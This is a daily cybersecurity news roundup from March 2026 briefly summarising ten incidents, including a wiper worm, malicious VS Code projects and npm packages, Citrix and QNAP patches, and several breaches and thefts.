CyberNews: 24/03/2026 Edition

Published by Dunateo on 2026-03-24

Today’s roundup

  • ‘CanisterWorm’ Springs Wiper Attack Targeting Iran
  • 81-month sentence for Russian hacker behind major ransomware campaigns
  • North Korea-linked threat actors abuse VS Code auto-run to spread StoatWaffle malware
  • Citrix Urges Patching Critical NetScaler Flaw Allowing Unauthenticated Data Leaks
  • QNAP fixed four vulnerabilities demonstrated at Pwn2Own Ireland 2025
  • Pro-Iranian Nasir Security is targeting energy companies in the Gulf
  • Hacker walks away with $24.5 million after breaching Resolv DeFi platform
  • Crunchyroll probes breach after hacker claims to steal 6.8M users' data
  • Ghost Campaign Uses 7 npm Packages to Steal Crypto Wallets and Credentials
  • Tycoon2FA phishing platform returns after recent police disruption

    • Summary

    The TeamPCP hacking group deployed "CanisterWorm," an Iran-targeted wiper that destroys data on systems identifying with Iran, including Kubernetes clusters, orchestrated via ICP canisters. The group also continued supply chain attacks, compromising Aqua Security's Trivy and Checkmarx GitHub Actions to steal credentials.

    A 26-year-old Russian, Aleksei Olegovich Volkov, received an 81-month U.S. prison sentence for acting as an initial access broker for ransomware groups, including Yanluowang, causing over $9 million in damages. He was ordered to pay $9.1 million in restitution.

    North Korea-linked "Team 8" is spreading "StoatWaffle" malware via malicious Microsoft Visual Studio Code projects that exploit "tasks.json" auto-run. This modular malware includes stealer and RAT functions, targeting browser credentials, extension data, and macOS Keychain.

    Citrix issued urgent patches for two NetScaler ADC and Gateway vulnerabilities, including a critical unauthenticated data leak flaw (CVE-2026-3055, CVSS 9.3), and a race condition (CVE-2026-4368).

    QNAP addressed four SD-WAN router vulnerabilities (CVE-2025-62843 to -62846) in QuRouter, demonstrated by Team DDOS at Pwn2Own Ireland 2025. These flaws allowed root access, code execution, and data access.

    The pro-Iranian "Nasir Security" group is targeting energy companies and their supply chain vendors in the Middle East. Tactics include BEC, spear phishing, exploiting public-facing applications, and cloud data exfiltration to steal sensitive documents for potential future attacks.

    A hacker stole approximately $24.5 million in Ethereum from the Resolv DeFi platform. The platform offered the attacker 10% of the stolen funds for the return of the remaining assets.

    Anime streaming platform Crunchyroll is investigating claims from hackers who allege they compromised systems and exfiltrated personal information belonging to approximately 6.8 million users.

    The "Ghost campaign," attributed to "mikilanjillo," involves seven malicious npm packages designed to steal cryptocurrency wallets and sensitive credentials. The packages pose a supply chain risk for developers.

    The "Tycoon2FA" phishing-as-a-service (PhaaS) platform has resumed operations at previous activity levels following a disruption by Europol in early March. It continues to leverage AITM techniques to bypass MFA.

    Want to dig deeper?

    Vulnerabilities

    CVE-2026-3055 Medium
    CVE-2026-4368 Medium
    CVE-2025-62843 Low